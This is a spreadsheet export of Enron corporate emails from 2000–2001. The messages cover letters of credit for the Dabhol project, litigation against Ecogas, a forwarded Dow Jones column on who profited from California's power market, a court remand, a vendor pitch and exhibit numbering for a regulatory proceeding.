_x000D_
We reviewed and modified the paper about our new VAR method, tried to_x000D_
make it_x000D_
readable and take in account your comments. Discussions with Vince_x000D_
helped a lot also._x000D_
_x000D_
Can you, please, review the paper again?_x000D_
_x000D_
Highly appreciate your input,_x000D_
_x000D_
Tanya_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kaminski, Vince J  _x000D_
Sent:	Wednesday, October 24, 2001 5:25 PM_x000D_
To:	Tamarchenko, Tanya_x000D_
Subject:	Paper_x000D_
_x000D_
 &lt;&lt; File: Rel_VAR_lucid1_WJK.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Wed, 19 Dec 2001 12:40:33 -0800 (PST)</t>
  </si>
  <si>
    <t>This afternoon</t>
  </si>
  <si>
    <t xml:space="preserve">Both Dan and Scott Brown are available to talk at 5pm.  I told Scott you guys would call him.  Dan can't talk for long since he has a 5:30 on 50.  </t>
  </si>
  <si>
    <t>Sun, 3 Dec 2000 06:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dabhol Phase II l/cs</t>
  </si>
  <si>
    <t xml:space="preserve">did i send this to already? fyi. this was very contentious at India mtg w/ _x000D_
Lay &amp; Skilling. We need to understand what our exposure is. You need to _x000D_
become our India expert. Tx Rick_x000D_
---------------------- Forwarded by Rick Buy/HOU/ECT on 12/03/2000 02:28 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Bill Gathmann@ENRON_DEVELOPMENT_x000D_
11/29/2000 04:47 PM_x000D_
To: Rick Buy/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Dabhol Phase II l/cs_x000D_
_x000D_
Rick, _x000D_
_x000D_
Attached is a listing of various incremental Phase II l/c's which we recently _x000D_
put together as part of the selldown.  The first table highlights the two _x000D_
l/c's which the sponsors have committed to.  Enron would have to pick up _x000D_
either 65% of these (if we can get MSEB to pick up their 15% share) or 80%.  _x000D_
The other l/c's in the second table are solely the responsibility of DPC.  It _x000D_
would be up to the sponsors to decide to what extent they want to help _x000D_
support these.  Let's discuss if your numbers are different from these._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 Aug 2000 05:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Socal - Deal #151617 for July '00</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Jane M Tholt/HOU/ECT on 08/23/2000 12:18 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Donnie Myers @ ENRON                           08/23/2000 11:16 AM_x000D_
	_x000D_
_x000D_
To: Jane M Tholt/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Socal - Deal #151617 for July '00_x000D_
_x000D_
Janie,_x000D_
_x000D_
 I have been talking with EES and they have confirmed their volumes for their _x000D_
purchases from ENA (I believe that it is Zarin who comfirmed their volumes on _x000D_
their side).  I need you to confirm and verify our volumes and to change them _x000D_
(or contact who can change them) if needed.  I am trying to get EES to pay us _x000D_
for these transactions and they will not if they do not agree.  The amount _x000D_
that we are talking about is over $10 mil.  Could you please look at this so _x000D_
that I can get this resolved today?  The following shows what we are out:_x000D_
_x000D_
_x000D_
_x000D_
Please let me know what you find out.  Thanks..._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 02:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>briefing book</t>
  </si>
  <si>
    <t>Goodmorning!  Just wanted to let you know that I talked with Steffes last _x000D_
night and he said to pull as much together by 3:00 today so that Steve can _x000D_
review over the weekend (whether documents are complete or not).  Just give _x000D_
me what you haave by 3:00 today.  Also, I am including 3 reports (BAEF, and _x000D_
two CERA reports) into the book.  Call if you have questions._x000D_
=)</t>
  </si>
  <si>
    <t>Misc. Ecogas Litigation</t>
  </si>
  <si>
    <t>As you know there are several litigations pending against Ecogas, EZ Products _x000D_
and/or Enron (or a combination) which could be problematic to our current _x000D_
strategy of selling the assets to PNE.  They are as follows (with _x000D_
comments/status provided):_x000D_
_x000D_
Wisvest - both PNE and Ecogas are working towards a settlement/restructuring _x000D_
which will include them releasing Ecogas from all obligations and dismissal _x000D_
of their pending suit.  We're trying to get this completed prior to closing._x000D_
Tom Hall - Ecogas owes Tom $41K (Tom says $46K) for which we've offered to _x000D_
settle with thim pari-passu with all other creditors at 50 c/$ ($21K).  He _x000D_
has rejected the offer and is planning to move forward with depositions, _x000D_
etc...  Our plan per my conversation w/ Lisa yesterday is to escrow the money _x000D_
($21K) we offered in the Settlement sent to him last Friday, 12/1._x000D_
Lyon Credit/United Hudson Bank - I am trying to contact them to see if I can _x000D_
get them to either dismiss the suit or settle for $25K or less._x000D_
WMI/Davis St. - Richard is supposed to be contacting WMI's legal to discuss._x000D_
Victoria Sterling - I am trying to contact her to see if she'll settle for _x000D_
$25K or less._x000D_
ISCO (has sued EZ Products, Ecogas and Enron) - Richard is supposed to _x000D_
contact their legal counsel to discuss merits of suing Enron._x000D_
_x000D_
Is there anything else we should be doing to mitigate potential problems if _x000D_
we can't get any of them to settle/dismiss their suits?  Who is handling _x000D_
responses, filings, pleadings, etc... for each of these cases while they're _x000D_
status is uncertain?  Currently, we have no counsel re: Victoria Sterling and _x000D_
ISCO.  I'm not sure who's doing what on Wisvest, Tom Hall or Lyon Credit.  _x000D_
Previously, Milbank Tweed was handling WMI but I haven't seen or heard of _x000D_
anything being done so I'm not sure about this either._x000D_
_x000D_
Doug Daniels at Bracewell has encouraged us on several occasions to run our _x000D_
strategy by bankruptcy counsel in the event they won't settle and end up _x000D_
putting Ecogas into bankruptcy.  Per my discussion with Lisa yesterday, she _x000D_
does not feel the cost is warranted.</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 12:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CSFB: Proton Energy results in-line with expectations. Maintain_x000D_
 Buy.</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;prtn111400.pdf&gt;&gt;_x000D_
_x000D_
Energy Technology Research_x000D_
CREDIT | FIRST_x000D_
SUISSE | BOSTON_x000D_
_x000D_
Marko Pencak (Hardware)_x000D_
Neil Stein (Independent Power and e-Commerce)_x000D_
Cameron Jeffreys (Associate)_x000D_
_x000D_
_x000D_
_x000D_
 - prtn111400.pdf</t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 01:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.steffes@enron.com', 'richard.sanders@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'richard.shapiro@enron.com', 'tim.heizenrader@enron.com', 'chris.stokley@enron.com', 'steve.c.hall@enron.com', "murray.o'neil@enron.com", 'jeff.richter@enron.com', 'robert.badeer@enron.com'})</t>
  </si>
  <si>
    <t>THE WINNERS IN CALIFORNIA</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mary Hain/HOU/ECT on 10/02/2000 08:43 AM _x000D_
---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Ronald Carroll" &lt;rcarroll@bracepatt.com&gt;                           _x000D_
10/02/2000 06:48 AM_x000D_
	_x000D_
_x000D_
To: &lt;jhartso@enron.com&gt;, &lt;mary.hain@enron.com&gt;, &lt;smara@enron.com&gt;, _x000D_
&lt;snovose@enron.com&gt;_x000D_
cc:  _x000D_
Subject: THE WINNERS IN CALIFORNIA_x000D_
_x000D_
_x000D_
 DJ POWER POINTS: Winners In $4 Billion Calif Sweepstakes_x000D_
&gt;   By Mark Golden_x000D_
&gt;   A Dow Jones Newswires Column_x000D_
&gt;_x000D_
&gt;   NEW YORK (Dow Jones)--Now that PG&amp;E Corp (PCG), Edison International_x000D_
&gt; (EIX)_x000D_
&gt; and_x000D_
&gt; Sempra Energy (SRE) have announced that about $4 billion in power costs_x000D_
&gt; flew_x000D_
&gt; out_x000D_
&gt; their windows this summer, Wall Street might be curious to know on which_x000D_
&gt; corporate doorsteps the windfall landed._x000D_
&gt;   A few of the beneficiaries have indicated publicly how well they did_x000D_
&gt; this_x000D_
&gt; summer. We've supplemented those announcements with data on market share,_x000D_
&gt; conversations with western U.S. electricity traders, second quarter_x000D_
&gt; earnings_x000D_
&gt; reports and publicly available information from the California Independent_x000D_
&gt; System Operator - operator of the state's high-voltage transmission grid_x000D_
&gt; and_x000D_
&gt; real-time power market - to create this Top 10 list of winners in the_x000D_
&gt; Summer_x000D_
&gt; of_x000D_
&gt; Luck._x000D_
&gt;_x000D_
&gt;   No. 10: Duke Energy Corp (DUK), Calpine Corp (CPN) and AES Corp (AES)._x000D_
&gt; These_x000D_
&gt; companies, with significant merchant power plants in California, didn't_x000D_
&gt; make_x000D_
&gt; as_x000D_
&gt; much money as they could have because they sold their power before prices_x000D_
&gt; started rising._x000D_
&gt;   AES, for starters, has sold the vast majority of the capacity of its_x000D_
&gt; California natural-gas fired generators under a long-term, fixed-price_x000D_
&gt; contract_x000D_
&gt; to make power for another company - a company much higher on this list -_x000D_
&gt; which_x000D_
&gt; supplies the natural gas and owns the electricity._x000D_
&gt;   Duke, with 2,680 megawatts of generators in California, lost out on_x000D_
&gt; significant potential income, because it sold most of its power months_x000D_
&gt; before_x000D_
&gt; prices started to rise._x000D_
&gt;_x000D_
&gt;   No. 9: Electricity trading companies. These companies, like Utilicorp_x000D_
&gt; United's_x000D_
&gt; (UCU) Aquila, Citizens Power (now owned by Edison International) and_x000D_
&gt; Belgian_x000D_
&gt; company Tractebel's (B.TRB) U.S. unit, mostly traded in and out of_x000D_
&gt; positions_x000D_
&gt; -_x000D_
&gt; and they made good profits doing so. This group also includes the_x000D_
&gt; unregulated_x000D_
&gt; trading units of Sempra and PG&amp;E._x000D_
&gt;_x000D_
&gt;   No. 8: Western utilities with power to spare, namely Arizona Public_x000D_
&gt; Service_x000D_
&gt; Co., the Public Service Co. of New Mexico (PNM) and IdaCorp Inc.'s (IDA)_x000D_
&gt; Idaho_x000D_
&gt; Power._x000D_
&gt;   PNM said on Sept. 14 that it made $193 million in wholesale marketing_x000D_
&gt; during_x000D_
&gt; July and August, a 90% increase over the same two months last year._x000D_
&gt; Arizona_x000D_
&gt; Public Service, which is a subsidiary of Pinnacle West Capital Corp (PNW),_x000D_
&gt; had_x000D_
&gt; considerably more power to sell than PNM, market sources said._x000D_
&gt;_x000D_
&gt;   No. 7: TransAlta (T.TA) and PPL Global (PPL). Western electricity prices_x000D_
&gt; have_x000D_
&gt; been high outside California as well. TransAlta and PPL reached deals to_x000D_
&gt; buy_x000D_
&gt; two_x000D_
&gt; major coal-fired power plants in the Northwest last year and took_x000D_
&gt; ownership_x000D_
&gt; before this summer. Unlike gas, coal is still cheap._x000D_
&gt;_x000D_
&gt;   No. 6: Enron Corp (ENE), El Paso Energy (EPG) and the energy trading_x000D_
&gt; unit_x000D_
&gt; of_x000D_
&gt; Morgan Stanley-Dean Witter (MWD). Unlike the in-and-out traders, these_x000D_
&gt; companies_x000D_
&gt; bet on rising prices and came into the summer holding large supplies in_x000D_
&gt; the_x000D_
&gt; West, electricity traders said._x000D_
&gt;   "Enron just bought and bought and bought before the summer, and never_x000D_
&gt; seemed_x000D_
&gt; to sell," said one trader._x000D_
&gt;   El Paso also owns 896 MW of generation in California._x000D_
&gt;_x000D_
&gt;   No. 5: The U.S. Federal Government and the State of Arizona. Federal_x000D_
&gt; utility_x000D_
&gt; Bonneville Power Administration and Arizona public utility Salt River_x000D_
&gt; Project_x000D_
&gt; rode to California's rescue on the hottest days this summer, providing_x000D_
&gt; hundreds_x000D_
&gt; of megawatts of supply at top dollar._x000D_
&gt;_x000D_
&gt;   No. 4: California's independent generators. The merchant power companies_x000D_
&gt; in_x000D_
&gt; California that did the best this summer are Reliant Energy Inc. (REI),_x000D_
&gt; with_x000D_
&gt; about 4,063 MW of California capacity; Southern Co. (SO), with about 3,000_x000D_
&gt; MW;_x000D_
&gt; NRG Energy (NRG), with 1,500 MW; and Dynegy Inc. (DYN), with 1,250 MW._x000D_
&gt;   Unlike Duke, AES and Calpine, these companies held on to most of their_x000D_
&gt; power_x000D_
&gt; and sold it in the day-ahead and real-time markets, where prices turned_x000D_
&gt; out_x000D_
&gt; to_x000D_
&gt; be best._x000D_
&gt;   Reliant has already indicated that third quarter earnings available for_x000D_
&gt; equity_x000D_
&gt; will top last year's figure by about $110 million._x000D_
&gt;   All of these companies, however, saw their windfall trimmed by_x000D_
&gt; diversification. Each owns gas-fired and some oil-fired merchant power_x000D_
&gt; plants in_x000D_
&gt; the eastern U.S., where high fuel prices and low electricity prices have_x000D_
&gt; damped_x000D_
&gt; profits._x000D_
&gt;   "We've had a good summer, but we have a pretty balanced portfolio across_x000D_
&gt; the_x000D_
&gt; country," Stephen Bergstrom, president and chief executive of Dynegy, said_x000D_
&gt; in an_x000D_
&gt; interview. "As good as the summer has been in the West, it's been as bad_x000D_
&gt; in_x000D_
&gt; the_x000D_
&gt; eastern half of the country."_x000D_
&gt;_x000D_
&gt;   No. 3: Los Angeles Dept. of Water &amp; Power (and its bondholders). LADWP_x000D_
&gt; has_x000D_
&gt; about 7,000 MW of generation, or about 2,000 MW more than it needs for its_x000D_
&gt; customers. As LADWP general manager S. David Freeman said a few weeks ago,_x000D_
&gt; "A_x000D_
&gt; blind pig could make money with that setup."_x000D_
&gt;_x000D_
&gt;   No. 2: The heavily taxed citizens of British Columbia, Canada. Their_x000D_
&gt; provincially owned utility, BC Hydro, has been very busy this summer_x000D_
&gt; turning_x000D_
&gt; (free!) water into electricity worth hundreds of millions of dollars more_x000D_
&gt; than_x000D_
&gt; expected and flooding the province's general funds. With hydroelectric dam_x000D_
&gt; reservoirs the size of New England and transmission lines that can carry_x000D_
&gt; 3,000_x000D_
&gt; MW of southbound power, BC Hydro has single-handedly kept socialism_x000D_
&gt; solvent_x000D_
&gt; for_x000D_
&gt; another year in British Columbia._x000D_
&gt;_x000D_
&gt;   And the Grand Prize winner in the California Utilities  Sweepstakes:_x000D_
&gt; Williams_x000D_
&gt; Companies (WMB), the company AES's generators are working for. Williams_x000D_
&gt; controls_x000D_
&gt; almost 4,000 MW of gas-fired generation in the San Diego area, a little_x000D_
&gt; more_x000D_
&gt; than 10% of what California's utilities need on average during daylight_x000D_
&gt; hours in_x000D_
&gt; the summer._x000D_
&gt;   What's more, those plants are under contract as "resource must run" with_x000D_
&gt; the_x000D_
&gt; ISO. Their power can't be sold in the forward market. Williams had to take_x000D_
&gt; daily_x000D_
&gt; and real-time market prices by default, which is exactly what you would_x000D_
&gt; have_x000D_
&gt; done to maximize profits._x000D_
&gt;   And Williams isn't hurt by the factors that have diluted other_x000D_
&gt; companies'_x000D_
&gt; California gains. It isn't very exposed in the East; and as a big producer_x000D_
&gt; of_x000D_
&gt; natural gas, it's benefiting from high gas prices nationwide._x000D_
&gt;   Just to give an idea of how well the company likely has done this_x000D_
&gt; summer,_x000D_
&gt; consider that Williams' second quarter profit from its energy services_x000D_
&gt; segment_x000D_
&gt; rose to $412 million this year from $106 million in the second quarter of_x000D_
&gt; 1999._x000D_
&gt; That in a quarter with one and a half months of soaring prices. In the_x000D_
&gt; third_x000D_
&gt; quarter, there were three._x000D_
&gt;   -By Mark Golden, Dow Jones Newswires; 201-938-4604;_x000D_
&gt; mark.golden@dowjones.com_x000D_
&gt;_x000D_
&gt;   (END) Dow Jones Newswires  29-09-00_x000D_
&gt;   1800GMT(AP-DJ-09-29-00 1800GMT)_x000D_
&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 04:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Remand</t>
  </si>
  <si>
    <t>As you will note from the attached e-mail, the Quinque class action has been _x000D_
remanded to state district court in Hugoton Kansas. Robin Gibbs had always _x000D_
predicted that this was the likely result. We will now proceed with the _x000D_
battle over class certification in Kansas, which,unlike Texas, is not _x000D_
necessarily appealable. I will keep you posted.._x000D_
----- Forwarded by Richard B Sanders/HOU/ECT on 01/12/2001 12:25 PM -----_x000D_
_x000D_
	"Tetrault, Charles D." &lt;ctetrault@velaw.com&gt;_x000D_
	01/12/2001 11:58 AM_x000D_
		 _x000D_
		 To: "Richard B. Sanders (E-mail)" &lt;Richard.B.Sanders@enron.com&gt;, "Andrew M. _x000D_
Edison (E-mail)" &lt;andrew.edison@enron.com&gt;, "Staci Holtzman (E-mail)" _x000D_
&lt;sholtzm@enron.com&gt;, "Charles E. Cheek (E-mail)" &lt;ccheek@enron.com&gt;, "Janet _x000D_
Place (E-mail)" &lt;jplace@enron.com&gt;, "Britt Davis (E-mail)" _x000D_
&lt;bdavis@enron.com&gt;, "Michael P. Moran (E-mail)" &lt;Michael_Moran@enron.com&gt;, _x000D_
"Rebecca Zikes (E-mail)" &lt;bzikes@enron.com&gt;, "Drew Fossum (E-mail)" _x000D_
&lt;Drew_Fossum@enron.com&gt;_x000D_
		 cc: "Barrett H. Reasoner (E-mail)" &lt;breasoner@Gibbs-Bruns.com&gt;, "Andrew L. _x000D_
Pickens (E-mail)" &lt;Apickens@Gibbs-Bruns.com&gt;_x000D_
		 Subject: Remand_x000D_
_x000D_
_x000D_
Andy is calling now, but for those of you he does reach immediately, here is_x000D_
a short report based on a conversation that he had with Mike Beatty._x000D_
_x000D_
Judge Downes granted the motion to remand.  A short written order will be_x000D_
out later today or Monday._x000D_
_x000D_
He apparently read from a draft of the order, and Mike Beatty says that it_x000D_
was written in high level generalities about presumptions in favor of_x000D_
remand, burden to establish removal jurisdiction, etc. and did not address_x000D_
the details of our federal jurisdiction (e.g., OCSLA) arguments.  More later_x000D_
today._x000D_
_x000D_
_x000D_
_x000D_
Charles D. Tetrault_x000D_
Vinson &amp; Elkins L.L.P._x000D_
1455 Pennsylvania Ave., N.W._x000D_
Washington, D.C. 20004-1008_x000D_
ctetrault@velaw.com_x000D_
202.639.6551 [voice]_x000D_
202.639.6604 [fax]_x000D_
_x000D_
          ++++++CONFIDENTIALITY NOTICE+++++_x000D_
The information in this email may be confidential and/or privileged.  This_x000D_
email is intended to be reviewed by only the individual or organization_x000D_
named above.  If you are not the intended recipient or an authorized_x000D_
representative of the intended recipient, you are hereby notified that any_x000D_
review, dissemination or copying of this email and its attachments, if any,_x000D_
or the information contained herein is prohibited.  If you have received_x000D_
this email in error, please immediately notify the sender by return email_x000D_
and delete this email from your system.  Thank You</t>
  </si>
  <si>
    <t>Wed, 18 Jul 2001 14:04:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'panton@algorithmics.com'})</t>
  </si>
  <si>
    <t>Hi Rick_x000D_
_x000D_
I met with Vince Kaminski last week in Houston.  The primary purpose for my_x000D_
meeting was to introduce Algorithmics to his research team and identify any_x000D_
opportunities for Algorithmics to add value to Enron's risk management_x000D_
process.  Our discussion revealed a number of areas which are of interest to_x000D_
Vince, namely counterparty default data and credit risk calculation_x000D_
performance.  We agreed that the latter issue warranted a follow up_x000D_
discussion and I'm working with Vince to co-ordinate this meeting.  As chief_x000D_
risk officer for Enron, I thought you might find value in our offering, so I_x000D_
have taken the liberty to send you an information package. Briefly,  Algo_x000D_
specializes in providing clients with a consistent framework for risk_x000D_
measurement and management across the entire organization - including_x000D_
market, credit, liquidity and operational risk.  This is delivered through_x000D_
our patented Mark-to-Future methodology - a combination of technology and_x000D_
advanced financial engineering. _x000D_
_x000D_
To date we have about 120 clients world-wide (see URL link for details_x000D_
http://www.algorithmics.com/corporate/clients/index.shtml_x000D_
_x000D_
Other commodity and energy clients include, PG&amp; E Corp. , Axia Energy,_x000D_
Cemex, S.A.  Once you've had the opportunity to review the documentation, I_x000D_
would be happy to   give you a short presentation on our solution. This will_x000D_
help solidify the concepts illustrated in the information package.  _x000D_
_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Peter Antoniadis_x000D_
416-217-4166</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 07:41:53 -0800 (PST)</t>
  </si>
  <si>
    <t>Contract Settlement - Required Approvals</t>
  </si>
  <si>
    <t xml:space="preserve">Lance -_x000D_
_x000D_
It is my understanding that Enron Credit is currently closing down operations.  In light of this, EC has a contractual obligation to a company called Risk Metrics Group.  The obligation arises out of the development and hosting by RMG of a website devoted to the use of EC's credit risk data - the site being mainly focused toward subscribers to other RMG products.  Since we are terminating the development and hosting agreement - in essence shutting down the site - we will owe RMG approximately $96,000._x000D_
_x000D_
While I realize this is a small sum, I wanted to make sure (1) there are no approvals under the merger agreement that are required for a settlement of this nature and (2) if we are tracking this type of liability for merger purposes, that I provide the necessary information to the appropriate personnel._x000D_
_x000D_
Please let me know if either of the above are necessary._x000D_
_x000D_
Thanks._x000D_
_x000D_
Mark  </t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 02:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'paul.choi@enron.com', 'miguel.garcia@enron.com', 'rogers.herndon@enron.com', 'janice.moore@enron.com', 'david.porter@enron.com', 'kimberly.allen@enron.com', 'diana.allen@enron.com', 'alton.jackson@enron.com', 'chad.starnes@enron.com', 'genia.fitzgerald@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'smith.day@enron.com', 'monika.causholli@enron.com', 'rhonda.robinson@enron.com', 'dean.laurent@enron.com', 'mark.confer@enron.com', 'tom.moran@enron.com', 'jeff.richter@enron.com', 'amy.horton@enron.com', 'anna.santucci@enron.com', 'michael.driscoll@enron.com', 'laura.jones@enron.com', 'joe.quenet@enron.com', 'bert.meyers@enron.com', 'chris.mallory@enron.com', 'jan.king@enron.com', 'cara.semperger@enron.com', 'steve.gim@enron.com', 'john.malowney@enron.com', 'debbie.brackett@enron.com', 'claudia.guerra@enron.com', 'russell.kelley@enron.com', 'mark.guzman@enron.com', 'maria.valdes@enron.com', 'george.hopley@enron.com', 'joe.errigo@enron.com', 'stephanie.piwetz@enron.com', 'joseph.wagner@enron.com', 'lester.rawson@enron.com', 'robert.benson@enron.com', 'kimberly.hundl@enron.com', 'paul.thomas@enron.com', 'kerri.thompson@enron.com', 'd.hunsucker@enron.com', 'jeff.king@enron.com', 'kate.symes@enron.com', 'justin.laverell@enron.com', 'william.bradford@enron.com', 'stewart.rosman@enron.com', 'jesse.bryson@enron.com', 'karla.compean@enron.com', 'edward.baughman@enron.com', 'sharen.cason@enron.com', 'jason.crawford@enron.com', 'tanya.rohauer@enron.com', 'ricardo.perez@enron.com', 'marcus.nettelton@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'michael.kelly@enron.com', 'michael.etringer@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'janet.moore@enron.com', 'chris.dorland@enron.com', 'russell.ballato@enron.com', 'david.fairley@enron.com', 'gerald.gilbert@enron.com', 'joseph.piotrowski@enron.com', 'tom.alonso@enron.com', 'bill.rust@enron.com', 'fran.chang@enron.com', 'greg.trefz@enron.com', 'john.suttle@enron.com', 'veronica.gonzalez@enron.com', 'john.forney@enron.com', 'benjamin.rogers@enron.com', 'chris.foster@enron.com', 'stanley.cocke@enron.com', 'larry.jester@enron.com', 'clint.dean@enron.com', 'david.ryan@enron.com', 'sean.crandall@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'david.portz@enron.com', 'karen.lambert@enron.com', 'jon.lewis@enron.com', 'erik.serio@enron.com', 'fletcher.sturm@enron.com', 'kevin.presto@enron.com', 'leslie.hansen@enron.com', 'patrick.hanse@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'mark.fischer@enron.com', 'wendy.conwell@enron.com', 'corry.bentley@enron.com', 'stacey.white@enron.com', 'andy.pace@enron.com', 'evelyn.metoyer@enron.com', 'richard.broussard@enron.com', 'andrea.dahlke@enron.com', 'rika.imai@enron.com', 'christopher.watts@enron.com', 'mitch.robinson@enron.com', 'rod.nelson@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'lawrence.clayton@enron.com', 'juan.padron@enron.com', 'janelle.scheuer@enron.com', 'thresa.allen@enron.com', 'kayne.coulter@enron.com', 'doug.miller@enron.com', 'casey.evans@enron.com', 'jason.choate@enron.com', 'elsie.lew@enron.com', 'gary.justice@enron.com', 'eric.smith@enron.com', 'larry.campbell@enron.com', 'todd.decook@enron.com', 'jenny.latham@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'kim.durham@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'phillip.platter@enron.com', 'mike.curry@enron.com', 'keller.mayeaux@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'brent.hebert@enron.com', 'monica.lande@enron.com', 'matt.motley@enron.com', 'christopher.smith@enron.com', 'valarie.sabo@enron.com', 'tracy.ngo@enron.com', 'christi.nicolay@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'joy.werner@enron.com', 'doug.sewell@enron.com', 'joe.gordon@enron.com', 'clayton.vernon@enron.com', 'george.wood@enron.com', 'holden.salisbury@enron.com', 'grace.kim@enron.com', 'gautam.gupta@enron.com', 'donald.vinson@enron.com', 'lisa.lees@enron.com', 'joe.stepenovitch@enron.com', 'robert.badeer@enron.com', 'mary.hain@enron.com', 'brant.reves@enron.com', 'oscar.dalton@enron.com', 'jim.homco@enron.com', 'john.llodra@enron.com', 'zachary.sampson@enron.com', 'lloyd.will@enron.com', 'leaf.harasin@enron.com', 'ryan.slinger@enron.com', 'gretchen.lotz@enron.com', 'elizabeth.sager@enron.com', 'larry.valderrama@enron.com', 'edward.sacks@enron.com', 'narsimha.misra@enron.com', 'matt.lorenz@enron.com', 'holli.krebs@enron.com', 'posey.martinez@enron.com', 'mike.swerzbin@enron.com', 'tom.dutta@enron.com', 'peter.makkai@enron.com', 'shari.stack@enron.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'geir.solberg@enron.com', 'carla.hoffman@enron.com', 'alex.wong@enron.com', 'diana.scholtes@enron.com', 'mark.symms@enron.com', 'leslie.reeves@enron.com', 'audrey.cook@enron.com'})</t>
  </si>
  <si>
    <t>Valley Electric Association, Inc.</t>
  </si>
  <si>
    <t>We have received the executed EEI Master Power Purchase and Sale Agreement _x000D_
dated 2/13/01 from the referenced CP.  Copies will be distributed to Legal _x000D_
and Credit.</t>
  </si>
  <si>
    <t>Fri, 19 May 2000 07:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tsurak@socalgas.com', 'rick.counihan@greenmountain.com', 'bdingwall@unitedgas.com', 'jteeter@sdge.com', 'wreed@sempra.com', 'paulamirault@aec.ca', 'rfoss@coral-energy.com', 'jharrigan@socalgas.com', 'dbarker@socalgas.com', 'jhay@sempra.com', 'rochmanm@cubjpa.org', 'bcherry@sempra.com', 'jmpa@dynegy.com', 'susan.scott@enron.com', 'rmorrow@socalgas.com', 'rochmanm@spurr.org', 'nmcvay@socalgas.com', 'johnj@bcjlaw.com', 'lschavrien@sempra.com', 'porterdk@sce.com', 'kmccrea@sablaw.com', 'chj@aelaw.com', 'dfollett@sempra.com', 'plg@cpuc.ca.gov', 'burkee@cts.com', 'tbrill@sempra.com', 'rmp@cpuc.ca.gov', 'alexanms@sce.com', 'johnson_pamela@lacoe.edu', 'llorenz@socalgas.com', 'gwright@sempra.com', 'ack@aelaw.com', 'enelson@socalgas.com', 'craigc@calpine.com', 'lindseyhowdowning@dwt.com', 'bsl@cpuc.ca.gov', 'jleslie@luce.com', 'rpurves@sdge.com', 'tomb@crossborderenergy.com', 'jdasovic@enron.com', 'tp2jxv@socalgas.com', 'rbetonte@socalgas.com', 'karpjos@sf.whitecase.com', 'wsakarias@sdge.com', 'swatson@socalgas.com', 'mday@gmssr.com', 'jfawcet@enron.com', 'douglass@arterhadden.com', 'jsuwara@sempra.com', 'eke@aelaw.com', 'david.bayless@utility.com'})</t>
  </si>
  <si>
    <t>RE: Exhibit List</t>
  </si>
  <si>
    <t xml:space="preserve">We're planning a slight revision to the exhibit numbers:_x000D_
_x000D_
We're making the Comprehensive Settlement Document, including the "errata"_x000D_
revisions, Ex.No.1.  I saw no point in offering the earlier version that had_x000D_
errors.  This frees up Ex. No. 13, and we'll give that to Rick Counihan's_x000D_
rebuttal (instead of #20) so we don't have to renumber anyone else's_x000D_
rebuttal.  Also, Ex.No.19 will not exist:  since Powerspring is withdrawing_x000D_
its testimony, Eric Nelson will not be serving rebuttal to it, which was_x000D_
going to be No.19._x000D_
_x000D_
Hope this makes sense.  If anyone has a problem, please scream._x000D_
_x000D_
Brian Cherry is out for the rest of the afternoon on personal business, so_x000D_
that's why this note is from me.  -- Glen Sullivan (619) 699-5162_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Cherry, Brian - TPBKC_x000D_
&gt; Sent: Thursday, May 18, 2000 8:27 AM_x000D_
&gt; To: Nelson, Eric B. - TPEBN; Cherry, Brian - TPBKC; 'AlexanMS@sce.com';_x000D_
&gt; 'paulamirault@aec.ca'; 'david.bayless@utility.com';_x000D_
&gt; 'Tomb@crossborderenergy.com'; 'Burkee@cts.com'; 'Craigc@calpine.com';_x000D_
&gt; 'Rick.Counihan@greenmountain.com'; 'Jdasovic@enron.com'; 'Mday@gmssr.com';_x000D_
&gt; 'bdingwall@unitedgas.com'; 'Douglass@arterhadden.com'; 'eke@aelaw.com';_x000D_
&gt; 'Jfawcet@enron.com'; 'rfoss@coral-energy.com'; 'plg@cpuc.ca.gov';_x000D_
&gt; 'johnj@bcjlaw.com'; 'Johnson_Pamela@lacoe.edu';_x000D_
